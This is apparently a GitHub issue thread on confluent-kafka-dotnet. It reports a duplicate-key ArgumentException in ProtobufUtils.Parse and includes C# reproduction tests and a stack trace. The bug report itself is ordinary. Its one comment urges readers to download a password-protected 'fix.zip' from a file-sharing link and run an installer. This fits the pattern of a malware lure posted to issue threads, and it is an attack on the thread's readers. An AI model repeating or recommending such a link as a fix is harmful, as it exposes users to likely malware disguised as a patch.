### ISSUE TITLE
ProtobufSerializer throws System.ArgumentException: An item with the same key has already been added (Showstopper defect)

### ISSUE THREAD

**Issue by yinzara** [confluentinc/confluent-kafka-dotnet#2297]
Description
===========
Upon upgrading to v2.5.2 (2.4.0 did not have this problem), the following errors is occuring when attempting to serialize any existing protobuf that uses a well known type.
This is a serious defect and makes any version past 2.4.0 unusable for Protobuf Serialization.

This looks like a mistake in that was introduced in the ProtobufUtils in commit c4f4c227afdf29ec520ddecd852766f9de83b0f2.

```CSharp
        public static FileDescriptorSet Parse(string schema, IDictionary<string, string> imports)
        {
            IDictionary<string, string> allImports = new Dictionary<string, string>(BuiltIns);
            imports?.ToList().ForEach(x => allImports.Add(x.Key, x.Value));
            
            var fds = new FileDescriptorSet();
            fds.FileSystem = new ProtobufImports(allImports);
            
            fds.Add("__root.proto", true, new StringReader(schema));
            foreach (KeyValuePair<string, string> import in allImports)
            {
                fds.AddImportPath(import.Key);
                
            }
            fds.Process();
            return fds;
        } 
```

When the dictionary is initialized with the `BuiltInts` if the incoming Parse() schema contains an import that's already in the BuiltIns, it throws a ArgumentException

How to reproduce
================
This original test case was actually completely invalid but here is the modification from the original with only a single line that breaks stuff:
```csharp
        public void ParseSchema()
        {
            string schema = @"syntax = ""proto3"";
            package io.confluent.kafka.serializers.protobuf.test;

            import ""ref.proto"";
            import ""confluent/meta.proto"";

            message ReferrerMessage {

                string root_id = 1 [(.confluent.field_meta) = { annotation: ""PII"" }];
                ReferencedMessage ref = 2 [(.confluent.field_meta).annotation = ""PII""];

            }";
            
            string import = @"syntax = ""proto3"";
            package io.confluent.kafka.serializers.protobuf.test;

            message ReferencedMessage {
                string ref_id = 1;
                bool is_active = 2;
            }
            ";

            IDictionary<string, string> imports = new Dictionary<string, string>();
            imports["ref.proto"] = import;
            imports["confluent/meta.proto"] = @"doesn't matter, will be overwritten anyway"; // <- this one line breaks the test case and it should have been included in the original

            var fds = ProtobufUtils.Parse(schema, imports);
            foreach (var file in fds.Files)
            {
                foreach (var messageType in file.MessageTypes)
                {
                    Assert.Equal("ReferrerMessage", messageType.Name);
                }
            }
        }
```

```csharp
Confluent.SchemaRegistry.Serdes.UnitTests.ProtobufSerializeDeserializeTests.ParseSchema

System.ArgumentException
An item with the same key has already been added. Key: google/protobuf/field_mask.proto
   at System.Collections.Generic.Dictionary`2.TryInsert(TKey key, TValue value, InsertionBehavior behavior)
   at System.Collections.Generic.Dictionary`2.Add(TKey key, TValue value)
   at Confluent.SchemaRegistry.Serdes.ProtobufUtils.<>c__DisplayClass8_0.<Parse>b__0(KeyValuePair`2 x) in /Users/yinzara/github/confluent-kafka-dotnet/src/Confluent.SchemaRegistry.Serdes.Protobuf/ProtobufUtils.cs:line 304
   at System.Collections.Generic.List`1.ForEach(Action`1 action)
   at Confluent.SchemaRegistry.Serdes.ProtobufUtils.Parse(String schema, IDictionary`2 imports) in /Users/yinzara/github/confluent-kafka-dotnet/src/Confluent.SchemaRegistry.Serdes.Protobuf/ProtobufUtils.cs:line 304
   at Confluent.SchemaRegistry.Serdes.UnitTests.ProtobufSerializeDeserializeTests.ParseSchema() in /Users/yinzara/github/confluent-kafka-dotnet/test/Confluent.SchemaRegistry.Serdes.UnitTests/ProtoSerializeDeserialize.cs:line 73
```

Turns out that test case was completely wrong and there is actually a much larger defect.
This updated test shows all the problems.
The `ParseSchema` method does not currently function at all

```CSharp
        [Fact]
        public void ParseSchema()
        {
            string schema = @"syntax = ""proto3"";
            package io.confluent.kafka.serializers.protobuf.test;

            import ""ref.proto"";
            import ""confluent/meta.proto"";

            message ReferrerMessage {

                string root_id = 1 [(confluent.field_meta) = { doc: ""PII"" }];
                ReferencedMessage ref = 2 [(confluent.field_meta).doc = ""PII""];

            }";

            string import = @"syntax = ""proto3"";
            package io.confluent.kafka.serializers.protobuf.test;

            message ReferencedMessage {
                string ref_id = 1;
                bool is_active = 2;
            }
            ";

            IDictionary<string, string> imports = new Dictionary<string, string>();
            imports["ref.proto"] = import;
            imports["confluent/meta.proto"] = "doesn't matter, will be overwritten anyway";

            var fds = ProtobufUtils.Parse(schema, imports);
            Assert.Equal(4, fds.Files.Count);

            var fileNames = fds.Files.Select(s => s.Name).ToHashSet();
            Assert.Contains("__root.proto", fileNames);
            Assert.Contains("ref.proto", fileNames);
            Assert.Contains("confluent/meta.proto", fileNames);
            Assert.Contains("google/protobuf/descriptor.proto", fileNames);

            var rootFile = fds.Files.First(s => s.Name == "__root.proto");
            Assert.Equal(1, rootFile.MessageTypes.Count);
            Assert.Equal("ReferrerMessage", rootFile.MessageTypes.First().Name);
        }
```

Checklist
=========

Please provide the following information:
 - [X] A complete (i.e. we can run it), minimal program demonstrating the problem. No need to supply a project file.
 - [ Latest ] Confluent.Kafka nuget version.
 - [ Latest ] Apache Kafka version.
 - [ ] Client configuration.
 - [ ] Operating system.
 - [ ] Provide logs (with "debug" : "..." as necessary in configuration).
 - [ ] Provide broker log excerpts.
 - [ X ] Critical issue.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
